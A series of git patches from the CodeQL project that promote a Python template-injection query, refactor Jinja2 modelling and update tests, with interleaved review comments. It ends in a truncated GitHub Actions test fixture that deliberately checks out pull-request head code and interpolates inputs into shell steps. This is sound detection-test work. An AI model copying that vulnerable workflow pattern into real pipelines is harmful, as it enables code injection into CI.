ImportMember | FlaskTemplate.py:11:39:11:66 | ControlFlowNode for Attribute() | This Template depends on $@. | FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| FlaskTemplate.py:17:41:17:68 | ControlFlowNode for Attribute() | FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | FlaskTemplate.py:17:41:17:68 | ControlFlowNode for Attribute() | This Template depends on $@. 
| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| JinjaSsti.py:10:25:10:32 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:25:10:32 | ControlFlowNode for template | This Template depends on $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | -| JinjaSsti.py:20:28:20:35 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:20:28:20:35 | ControlFlowNode for template | This Template depends on $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | -| MakoSsti.py:9:27:9:34 | ControlFlowNode for template | MakoSsti.py:6:10:6:16 | ControlFlowNode for request | MakoSsti.py:9:27:9:34 | ControlFlowNode for template | This Template depends on $@. | MakoSsti.py:6:10:6:16 | ControlFlowNode for request | user-provided value | -| TRender.py:7:24:7:31 | ControlFlowNode for template | TRender.py:5:13:5:19 | ControlFlowNode for request | TRender.py:7:24:7:31 | ControlFlowNode for template | This Template depends on $@. | TRender.py:5:13:5:19 | ControlFlowNode for request | user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref deleted file mode 100644 index 90efec9f636..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -experimental/Security/CWE-074/TemplateInjection.ql From f0163894b679bc99dcc8f5dcb031b0432e12696d Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 21 Nov 2024 17:23:49 +0000 Subject: [PATCH 0948/1267] fix link in qhelp refs --- python/ql/src/Security/CWE-074/TemplateInjection.qhelp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index 619d834d1cf..c3770d59cf2 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -25,6 +25,6 @@
    -
  • Portswigger : [Server Side Template Injection](https://portswigger.net/web-security/server-side-template-injection)
  • +
  • Portswigger: Server-Side Template Injection.
  • From 494d779541f508f1f81dc85c06e914ea1269c805 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 21 Nov 2024 17:43:36 +0000 Subject: [PATCH 0949/1267] Add changenote --- python/ql/src/change-notes/2024-11-21-template-injection.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 python/ql/src/change-notes/2024-11-21-template-injection.md diff --git a/python/ql/src/change-notes/2024-11-21-template-injection.md b/python/ql/src/change-notes/2024-11-21-template-injection.md new file mode 100644 index 00000000000..a2d782f8cc0 --- /dev/null +++ b/python/ql/src/change-notes/2024-11-21-template-injection.md @@ -0,0 +1,4 @@ +--- +category: newQuery +--- +* The Server Side Template Injection query (`py/template-injection`), originally contributed to the experimental query pack by @porcupineyhairs, has been promoted to the ain query suite. This query finds instances of templates for a template engine such as Jinja being constructed with user input. \ No newline at end of file From 0f0c1e1609c34c100c05dfe0c452f6a407aff159 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 22 Nov 2024 16:32:10 +0000 Subject: [PATCH 0950/1267] Test update --- .../library-tests/frameworks/django-v2-v3/template_test.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py index 2d25848fde6..ba98c8f4196 100644 --- a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py +++ b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py 
@@ -1,13 +1,13 @@ from django.template import Template, engines from django.urls import path -from django.http.response import HttpResponse, +from django.http.response import HttpResponse def a(request): # $requestHandler t = Template("abc").render() # $templateConstruction="abc" return HttpResponse(t) # $HttpResponse def b(request): # $requestHandler - # This case is not yet supported + # This case is not currently supported t = django.template.engines["django"].from_string("abc") # $MISSING:templateConstruction="abc" return HttpResponse(t) # $HttpResponse From 6e16ed52e886979450264578a9b21835391e6d66 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 09:49:31 +0000 Subject: [PATCH 0951/1267] Reveiw suggestions: Spelling/grammar fixes Co-authored-by: Taus --- python/ql/src/Security/CWE-074/TemplateInjection.qhelp | 2 +- python/ql/src/Security/CWE-074/TemplateInjection.ql | 2 +- python/ql/src/change-notes/2024-11-21-template-injection.md | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index c3770d59cf2..5b8827b05f3 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -18,7 +18,7 @@
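Review bot: In `b`, the call is written as `django.template.engines["django"].from_string("abc")`, but the only imports in the file are `from django.template import Template, engines`, `from django.urls import path` and `from django.http.response import HttpResponse`, so the name `django` is never bound and the imported `engines` goes unused. The `MISSING` annotation may therefore be recording an unresolved name rather than a real gap in the Django template model. Writing the line as `t = engines["django"].from_string("abc")` would exercise the engine lookup that the reworded comment describes; whether the result then stays `MISSING` depends on how the model handles the subscript, which is not visible here. The `urlpatterns` list continues outside the hunk.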

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    -

    In the following case, user input is not used to construct the template; rather is only used for as the parameters to render the template, which is safe.

    +

    In the following case, user input is not used to construct the template; rather it is only used as the parameters to render the template, which is safe.

    In the following case, a SandboxedEnvironment is used, preventing remote code execution.

    diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.ql b/python/ql/src/Security/CWE-074/TemplateInjection.ql index 2ea68414259..53b0a2e9b15 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.ql +++ b/python/ql/src/Security/CWE-074/TemplateInjection.ql @@ -16,5 +16,5 @@ import TemplateInjectionFlow::PathGraph from TemplateInjectionFlow::PathNode source, TemplateInjectionFlow::PathNode sink where TemplateInjectionFlow::flowPath(source, sink) -select sink.getNode(), source, sink, "This Template construction depends on $@.", source.getNode(), +select sink.getNode(), source, sink, "This template construction depends on a $@.", source.getNode(), "user-provided value" diff --git a/python/ql/src/change-notes/2024-11-21-template-injection.md b/python/ql/src/change-notes/2024-11-21-template-injection.md index a2d782f8cc0..7c604e9c993 100644 --- a/python/ql/src/change-notes/2024-11-21-template-injection.md +++ b/python/ql/src/change-notes/2024-11-21-template-injection.md @@ -1,4 +1,4 @@ --- category: newQuery --- -* The Server Side Template Injection query (`py/template-injection`), originally contributed to the experimental query pack by @porcupineyhairs, has been promoted to the ain query suite. This query finds instances of templates for a template engine such as Jinja being constructed with user input. \ No newline at end of file +* The Server Side Template Injection query (`py/template-injection`), originally contributed to the experimental query pack by @porcupineyhairs, has been promoted to the main query suite. This query finds instances of templates for a template engine such as Jinja being constructed with user input. \ No newline at end of file From 55557f8dd3d5e73a959ca4ddfcc537f662380858 Mon Sep 17 00:00:00 2001 
From: Joe Farebrother Date: Fri, 29 Nov 2024 10:12:46 +0000 Subject: [PATCH 0952/1267] Use API graohs directly --- .../lib/semmle/python/frameworks/Jinja2.qll | 19 +++++-------------- 1 file changed, 5 insertions(+), 14 deletions(-) diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index 0d0a8d98921..070176077e3 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -33,22 +33,13 @@ module Jinja2 { result = ModelOutput::getATypeNode("jinja.Environment~Subclass").getASubclass*() } - /** Gets a reference to an instance of `jinja2.Environment`. */ - private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t) { - t.start() and - result = EnvironmentClass::classRef().getACall() - or - exists(DataFlow::TypeTracker t2 | result = instance(t2).track(t2, t)) - } - - /** Gets a reference to an instance of `jinja2.Environment`. */ - DataFlow::Node instance() { instance(DataFlow::TypeTracker::end()).flowsTo(result) } + API::Node instance() { result = classRef().getAnInstance() } /** A call to `jinja2.Environment.from_string`. */ - private class Jinja2FromStringConstruction extends TemplateConstruction::Range, - DataFlow::MethodCallNode - { - Jinja2FromStringConstruction() { this.calls(EnvironmentClass::instance(), "from_string") } + private class Jinja2FromStringConstruction extends TemplateConstruction::Range, API::CallNode { + Jinja2FromStringConstruction() { + this = EnvironmentClass::instance().getMember("from_string").getACall() + } override DataFlow::Node getSourceArg() { result = this.getArg(0) } } From dd8b7a4a8fa3e26a3f7d61ce612574d6709f922d Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 10:21:13 +0000 Subject: [PATCH 0953/1267] Add additional test for safe case in documentation --- .../ql/test/library-tests/frameworks/jinja2/template_test.py | 4 ++++ 1 file changed, 4 insertions(+) 
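Review bot: `instance()` now has result type `API::Node` where it previously returned `DataFlow::Node`, and the predicate is not declared `private`, so any library or query outside this hunk that used `EnvironmentClass::instance()` as a data-flow node would no longer type-check; whether such callers exist cannot be seen from here. If they do, they would need to convert explicitly, for example with `instance().getAValueReachableFromSource()`. Separately, the context line at the top of the hunk resolves subclasses through the type name `jinja.Environment~Subclass` while the rest of the module refers to `jinja2`; if that string is meant to match the package name it appears to be missing the `2`, which would silently drop modelled subclasses as template-construction sinks. The module and the class body extend beyond the hunk.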
diff --git a/python/ql/test/library-tests/frameworks/jinja2/template_test.py b/python/ql/test/library-tests/frameworks/jinja2/template_test.py index 587de84f621..23cc9f151b9 100644 --- a/python/ql/test/library-tests/frameworks/jinja2/template_test.py +++ b/python/ql/test/library-tests/frameworks/jinja2/template_test.py @@ -1,7 +1,11 @@ from jinja2 import Environment, Template +from jinja2.sandbox import SandboxedEnvironment def test(): env = Environment() t = env.from_string("abc") # $ templateConstruction="abc" t = Template("abc") # $ templateConstruction="abc" + + env2 = SandboxedEnvironment() + t = env.from_string("abc") # No result as we don't model SandboxedEnvironment. We may wish to instead specifically model it as NOT vulnerable to template injection vulnerabilities. return t \ No newline at end of file From ebaab89933aaa6d2b95672d54ee6e8c04602a110 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 10:29:37 +0000 Subject: [PATCH 0954/1267] Formatting updates --- python/ql/lib/semmle/python/Frameworks.qll | 1 - python/ql/src/Security/CWE-074/TemplateInjection.ql | 4 ++-- .../frameworks/django-v2-v3/template_test.py | 12 ++++++------ .../library-tests/frameworks/flask/template_test.py | 4 ++-- .../library-tests/frameworks/jinja2/template_test.py | 2 +- 5 files changed, 11 insertions(+), 12 deletions(-) diff --git a/python/ql/lib/semmle/python/Frameworks.qll b/python/ql/lib/semmle/python/Frameworks.qll index af9417308ab..e6af222a615 100644 --- a/python/ql/lib/semmle/python/Frameworks.qll +++ b/python/ql/lib/semmle/python/Frameworks.qll @@ -17,7 +17,6 @@ private import semmle.python.frameworks.Asyncpg private import semmle.python.frameworks.Baize private import semmle.python.frameworks.Bottle private import semmle.python.frameworks.BSon -private import semmle.python.frameworks.Bottle private import semmle.python.frameworks.CassandraDriver private import semmle.python.frameworks.Chameleon private import semmle.python.frameworks.Cherrypy 
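Review bot: The added call is `env.from_string("abc")`, which goes through the plain `Environment` created at the top of `test()` rather than the `env2 = SandboxedEnvironment()` assigned on the line before, so `env2` is unused and the sandboxed case the comment describes is not exercised. Because `env.from_string("abc")` is already annotated as a `templateConstruction` a few lines above, this unannotated duplicate would be expected to show up as an unexpected result instead of demonstrating "no result". The line should read `t = env2.from_string("abc")` with the trailing comment kept as it is.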
diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.ql b/python/ql/src/Security/CWE-074/TemplateInjection.ql index 53b0a2e9b15..bc4c935bc37 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.ql +++ b/python/ql/src/Security/CWE-074/TemplateInjection.ql @@ -16,5 +16,5 @@ import TemplateInjectionFlow::PathGraph from TemplateInjectionFlow::PathNode source, TemplateInjectionFlow::PathNode sink where TemplateInjectionFlow::flowPath(source, sink) -select sink.getNode(), source, sink, "This template construction depends on a $@.", source.getNode(), - "user-provided value" +select sink.getNode(), source, sink, "This template construction depends on a $@.", + source.getNode(), "user-provided value" diff --git a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py index ba98c8f4196..1f59b4a03c2 100644 --- a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py +++ b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py @@ -2,14 +2,14 @@ from django.template import Template, engines from django.urls import path from django.http.response import HttpResponse -def a(request): # $requestHandler - t = Template("abc").render() # $templateConstruction="abc" - return HttpResponse(t) # $HttpResponse +def a(request): # $ requestHandler + t = Template("abc").render() # $ templateConstruction="abc" + return HttpResponse(t) # $ HttpResponse -def b(request): # $requestHandler +def b(request): # $ requestHandler # This case is not currently supported - t = django.template.engines["django"].from_string("abc") # $MISSING:templateConstruction="abc" - return HttpResponse(t) # $HttpResponse + t = django.template.engines["django"].from_string("abc") # $ MISSING:templateConstruction="abc" + return HttpResponse(t) # $ HttpResponse urlpatterns = [ path("a", a), # $ routeSetup="a" 
diff --git a/python/ql/test/library-tests/frameworks/flask/template_test.py b/python/ql/test/library-tests/frameworks/flask/template_test.py index 8d867e14829..e50ab706355 100644 --- a/python/ql/test/library-tests/frameworks/flask/template_test.py +++ b/python/ql/test/library-tests/frameworks/flask/template_test.py @@ -2,12 +2,12 @@ from flask import Flask, Response, stream_with_context, render_template_string, app = Flask(__name__) @app.route("/a") # $routeSetup="/a" -def a(): # $requestHandler +def a(): # $ requestHandler r = render_template_string("abc") # $ templateConstruction="abc" return r # $ HttpResponse @app.route("/b") # $routeSetup="/b" -def b(): # $requestHandler +def b(): # $ requestHandler s = stream_template_string("abc") # $ templateConstruction="abc" r = Response(stream_with_context(s)) # $ HttpResponse return r # $ HttpResponse diff --git a/python/ql/test/library-tests/frameworks/jinja2/template_test.py b/python/ql/test/library-tests/frameworks/jinja2/template_test.py index 23cc9f151b9..40004b4f1c5 100644 --- a/python/ql/test/library-tests/frameworks/jinja2/template_test.py +++ b/python/ql/test/library-tests/frameworks/jinja2/template_test.py @@ -7,5 +7,5 @@ def test(): t = Template("abc") # $ templateConstruction="abc" env2 = SandboxedEnvironment() - t = env.from_string("abc") # No result as we don't model SandboxedEnvironment. We may wish to instead specifically model it as NOT vulnerable to template injection vulnerabilities. + t = env2.from_string("abc") # No result as we don't model SandboxedEnvironment. We may wish to instead specifically model it as NOT vulnerable to template injection vulnerabilities. return t \ No newline at end of file From ef1d898b0d86bf0d2982ca6a65b54a9ff29bf0a0 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 10:44:48 +0000 Subject: [PATCH 0955/1267] Add qldoc --- python/ql/lib/semmle/python/frameworks/Jinja2.qll | 1 + 1 file changed, 1 insertion(+) 
diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index 070176077e3..0387db93631 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -33,6 +33,7 @@ module Jinja2 { result = ModelOutput::getATypeNode("jinja.Environment~Subclass").getASubclass*() } + /** Gets a reference to an instance of `jinja2.Environment`. */ API::Node instance() { result = classRef().getAnInstance() } /** A call to `jinja2.Environment.from_string`. */ From 462be46be9897ca9a7bd99f06d52eafb2e288bc6 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Fri, 29 Nov 2024 20:54:03 +0000 Subject: [PATCH 0956/1267] Update test output --- .../CWE-074-TemplateInjection/TemplateInjection.expected | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected index 3a833787a98..f9210772839 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected 
@@ -12,5 +12,5 @@ nodes | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | subpaths #select -| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This Template construction depends on $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | -| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This Template construction depends on $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | From 8a778da25327d1fa6ebe62adcd326289cbc11871 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Mon, 9 Dec 2024 10:22:24 +0000 Subject: [PATCH 0957/1267] Apply suggestions from docs review Co-authored-by: Ben Ahmady <32935794+subatoi@users.noreply.github.com> --- python/ql/src/Security/CWE-074/TemplateInjection.qhelp | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index 5b8827b05f3..ee416b77eec 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp 
@@ -8,7 +8,7 @@

    Ensure that an untrusted value is not used to directly construct a template. - Jinja also provides a SandboxedEnvironment that prohibits access to unsafe methods and attributes, that can be used if constructing a template from user input is absolutely necessary. + Jinja also provides SandboxedEnvironment that prohibits access to unsafe methods and attributes. This can be used if constructing a template from user input is absolutely necessary.

    @@ -18,7 +18,7 @@

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    -

    In the following case, user input is not used to construct the template; rather it is only used as the parameters to render the template, which is safe.

    +

    In the following case, user input is not used to construct the template. Instead, it is only used as the parameters to render the template, which is safe.

    In the following case, a SandboxedEnvironment is used, preventing remote code execution.

    From f82fa202496071d8587a6c6b96b836dd55813061 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Mon, 9 Dec 2024 20:37:11 +0000 Subject: [PATCH 0958/1267] Update test outputs --- .../test/library-tests/frameworks/Genshi/ConceptsTest.expected | 2 -- .../ql/test/library-tests/frameworks/Mako/ConceptsTest.expected | 2 -- .../test/library-tests/frameworks/TRender/ConceptsTest.expected | 2 -- .../library-tests/frameworks/airspeed/ConceptsTest.expected | 2 -- .../library-tests/frameworks/chameleon/ConceptsTest.expected | 2 -- .../test/library-tests/frameworks/chevron/ConceptsTest.expected | 2 -- .../test/library-tests/frameworks/jinja2/ConceptsTest.expected | 2 -- 7 files changed, 14 deletions(-) diff --git a/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file 
diff --git a/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected index a74f2c23cda..e69de29bb2d 100644 --- a/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected +++ b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected @@ -1,2 +0,0 @@ -testFailures -failures \ No newline at end of file From b80d3d56a364d7ddcd718126ba7ac559a3fcae64 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 21:47:09 +0100 Subject: [PATCH 0959/1267] exclude Simple refereces from GitHub context --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 12a65a52baa..9668fce2ae0 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -245,7 +245,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt | expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression or expr.(NeedsExpression).getNeededJobId() = value or @@ -279,7 +280,8 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { | expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression or expr.(NeedsExpression).getNeededJobId() = value or From bee0668cd0981df475b958469bf78d22bcd0e9d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 21:47:28 +0100 Subject: [PATCH 0960/1267] Add tests and update expected results --- .../.github/actions/action6/action.yml | 251 +++++++++++++++++ .../.github/actions/action7/action.yml | 252 ++++++++++++++++++ .../CWE-094/.github/workflows/test28.yml | 34 +++ .../CWE-094/CodeInjectionCritical.expected | 9 + .../CWE-094/CodeInjectionMedium.expected | 15 ++ .../UntrustedCheckoutCritical.expected | 4 - 6 files changed, 561 insertions(+), 4 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml 
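Review bot: The new `not expr instanceof GitHubExpression` guard in `ActionsMutableRefCheckout` (and the identical one in the `ActionsSHACheckout` hunk) takes `github.*` context references out of the name heuristic, including ones such as `github.head_ref` that name a contributor-controlled branch under `pull_request_target`. That is only safe if those expressions are still classified by another disjunct of these predicates, which cannot be checked here because both bodies start and end outside the hunks; a test asserting that a checkout with `ref: ${{ github.head_ref }}` is still reported would pin this down. A comment on the new line would record the intent, e.g. `// github.* context refs are classified explicitly elsewhere; skip them in this name-based heuristic`. Since `and` binds tighter than `or` the grouping is correct as written, but parenthesising the `... = value and not expr instanceof GitHubExpression` pair would make that obvious to the next reader.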
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml new file mode 100644 index 00000000000..0048a4ca31e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml 
@@ -0,0 +1,251 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q 
git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name 
